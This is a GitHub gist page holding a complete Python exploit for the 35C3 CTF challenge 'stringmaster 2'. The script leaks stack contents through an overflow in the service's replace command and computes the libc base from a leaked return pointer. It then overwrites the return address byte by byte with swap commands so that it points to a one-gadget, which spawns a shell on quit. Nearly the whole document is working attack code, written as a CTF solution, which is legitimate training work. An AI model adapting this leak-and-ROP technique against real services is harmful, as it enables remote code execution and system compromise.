35C3 - stringmaster 2 - my python exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import struct | |
import socket | |
# For finding hex sequence in given subarray (i.e finding pointers' addresses by their supposed value) | |
def find_index_of_subarray(arr, subarr): | |
index = 0 | |
for byte in arr: | |
if len(arr) - index < len(subarr): | |
return -1 | |
if byte == subarr[0]: | |
# Checking if arrays are equal | |
if arr[index:index + len(subarr)] == subarr: | |
return index | |
index += 1 | |
return -1 | |
# For returning sub-bytearray of given length at given index of given bytearray: | |
def get_subarray_at_address(length, index, byte_array): | |
if index + length > len(byte_array): | |
return -1 | |
else: | |
return byte_array[index:index + length] | |
# For finding byte index for given byte value in given array | |
# If found value but it is in protected line, pass this line. | |
def find_byte_index(byte_value, byte_array, protected_lines): | |
index = 0 | |
for byte in byte_array: | |
if byte == byte_value: | |
not_protected_line = True | |
for line in protected_lines: | |
if (not (index < line * 8) and not (index > (line + 1) * 8)): | |
not_protected_line = False | |
break | |
if not_protected_line: | |
return index | |
index += 1 | |
return -1 | |
class Client: | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
encoding = 'UTF-8' | |
decode_error_handling = 'ignore' | |
host = '' | |
port = 0 | |
last_retrieved_bytes = bytearray(0) | |
buffer_size = 512 | |
def __init__(self, host, port): | |
self.host = host | |
self.port = port | |
def connect(self): | |
self.sock.connect((self.host, self.port)) | |
def disconnect(self): | |
self.sock.close() | |
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
def wait_for_any_input(self): | |
print('\033[92m' + 'Waiting for any input.' + '\033[0m') | |
self.last_retrieved_bytes = bytearray(0) | |
buffer = self.sock.recv(self.buffer_size) | |
for byte in buffer: | |
self.last_retrieved_bytes.append(byte) | |
input_as_string = buffer.decode(self.encoding, self.decode_error_handling) | |
print(input_as_string) | |
def wait_for_prompt(self): | |
print('\033[94m' + 'Waiting for prompt.' + '\033[0m') | |
self.last_retrieved_bytes = bytearray(0) | |
input_as_string = '' | |
retrieved_full_prompt = False | |
ending_normal = 'quit \n> ' | |
ending_quit = 'You lost.' | |
while not retrieved_full_prompt: | |
buffer = self.sock.recv(self.buffer_size) | |
self.last_retrieved_bytes += buffer | |
input_as_string += buffer.decode(self.encoding, self.decode_error_handling) | |
retrieved_full_prompt = \ | |
(input_as_string.find(ending_normal) != -1) or (input_as_string.find(ending_quit) != -1) | |
print(input_as_string) | |
def retrieved_bytes_truncate_prompt(self): | |
beginning = 'Enter the command you want to execute:'.encode(self.encoding) | |
index = find_index_of_subarray(self.last_retrieved_bytes, beginning) | |
self.last_retrieved_bytes = self.last_retrieved_bytes[:index] | |
def prettyprint_retrieved_bytes(self): | |
offset = len(self.last_retrieved_bytes) | |
line = 1 | |
string = '' | |
# Don't worry, it's just an ANSI color code | |
string += '\033[91m' | |
while offset > 0: | |
str_line = 'Line ' + str(line).zfill(3) + ': ' | |
if offset >= 8: | |
for a in range(0, 8): | |
str_line += '0x' \ | |
+ hex(self.last_retrieved_bytes[a + (line - 1) * 8]).replace('0x', '').rjust(2, '0') + \ | |
' ' | |
else: | |
for a in range(0, offset): | |
str_line += '0x' \ | |
+ hex(self.last_retrieved_bytes[a + (line - 1) * 8]).replace('0x', '').rjust(2, '0') + \ | |
' ' | |
string += str_line + '\n' | |
offset -= 8 | |
line += 1 | |
string += '\033[0m' | |
print(string) | |
return string | |
def send(self, command_bytearr): | |
print('\033[92m' + 'Sending: ' + str(command_bytearr) + '\033[0m') | |
self.sock.sendall(command_bytearr) | |
def send_replace_overflow(self): | |
self.send('replace X a\n'.encode(self.encoding)) | |
def send_replace(self, char_1, bytearr): | |
command = ('replace ' + char_1 + ' ').encode(self.encoding) | |
command += bytearr | |
command += (' \n').encode(self.encoding) | |
print('Sending: ' + str(command)) | |
self.send(command) | |
def send_swap(self, index_1, index_2): | |
self.send(('swap ' + str(index_1) + ' ' + str(index_2) + ' \n').encode(self.encoding)) | |
def send_print(self): | |
self.send(('print\n').encode(self.encoding)) | |
def send_quit(self): | |
self.send(('quit\n').encode(self.encoding)) | |
def send_ls(self): | |
self.send(('ls\n').encode(self.encoding)) | |
# 17 * 8 is end of the 17-th octet (counting from zero), so practically it's 18-th line | |
return_pointer_index = 17 * 8 | |
libc_main_231_absolute = 0x21ab0 + 231 | |
client = Client('localhost', 22225) | |
client.connect() | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.send_replace_overflow() | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.retrieved_bytes_truncate_prompt() | |
client.prettyprint_retrieved_bytes() | |
copy = client.last_retrieved_bytes | |
libc_main_231_subarray = get_subarray_at_address(8, return_pointer_index, copy) | |
libc_main_231 = struct.unpack('<Q', libc_main_231_subarray)[0] | |
print('libc_main_231_addr is : ' + str(hex(libc_main_231))) | |
libc_base = libc_main_231 - libc_main_231_absolute | |
print('libc base is: ' + str(hex(libc_base))) | |
gadget_int = 0x4f2c5 + libc_base | |
print('gadget is: ' + str(hex(gadget_int))) | |
gadget_bytes = struct.pack('>Q', gadget_int) | |
# time.sleep(2) | |
# Firstly, for every byte of gadget, put its value on the beginning of the leaked data | |
# to make these bytes present on the stack, so we could use swap command in the second next step. | |
offset = 0 | |
for byte in gadget_bytes: | |
copy = client.last_retrieved_bytes | |
s = chr(copy[offset]) | |
bytearr = get_subarray_at_address(1, offset, gadget_bytes) | |
client.send_replace(s, bytearr) | |
offset += 1 | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.retrieved_bytes_truncate_prompt() | |
# m.client.prettyprint_retrieved_bytes() | |
# Now, for every byte of gadget, swap its value with corresponding return pointer byte | |
offset = 0 | |
for byte in reversed(gadget_bytes): | |
print('Swapping: ' + str(hex(byte))) | |
index = find_byte_index(byte, client.last_retrieved_bytes, [17]) | |
if index == -1: | |
print('Index for ' + str(byte) + ' not found!') | |
exit(-1) | |
else: | |
client.send_swap(return_pointer_index + offset, index) | |
offset += 1 | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.retrieved_bytes_truncate_prompt() | |
# m.client.prettyprint_retrieved_bytes() | |
print('Replaced all bytes for return pointer to libc_system') | |
client.send_quit() | |
client.wait_for_prompt() | |
client.send_ls() | |
print('This should be shell.') | |
client.wait_for_any_input() | |
print('Retrieved bytes counter: ' + str(len(client.last_retrieved_bytes))) | |
print(client.last_retrieved_bytes.decode('utf-8')) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment